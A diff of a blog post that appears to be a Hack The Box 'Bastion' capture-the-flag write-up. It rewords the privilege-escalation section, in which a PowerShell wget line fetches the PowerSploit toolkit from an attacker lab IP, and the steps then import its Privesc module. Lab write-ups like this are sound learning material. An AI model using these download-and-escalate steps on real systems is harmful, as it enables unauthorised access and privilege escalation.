Maddosaurus/maddosaurus.github.io/_posts/2020-06-06-htb-bastion.md

 ## Road to root
-Basically, I'm following this article: https://www.fuzzysecurity.com/tutorials/16.html
-We're making use of Matt Graebers excellent tool, Powersploit.
+A try was to make use of Matt Graebers tool, Powersploit.

-Get PowerSploit
+First, Powersploit needs to be downloaded:
 `wget http://10.10.15.195:8000/PowerSploit-3.0.0.zip -OutFile ps.zip`
-In more detail, PowerUp.
-So download the Privesc folder into the PS Module path, import the module and fire away!
+So download the Privesc folder into the PS Module path, import the module and run:
 ```
 Import-Module Privesc
 Get-Command -Module Privesc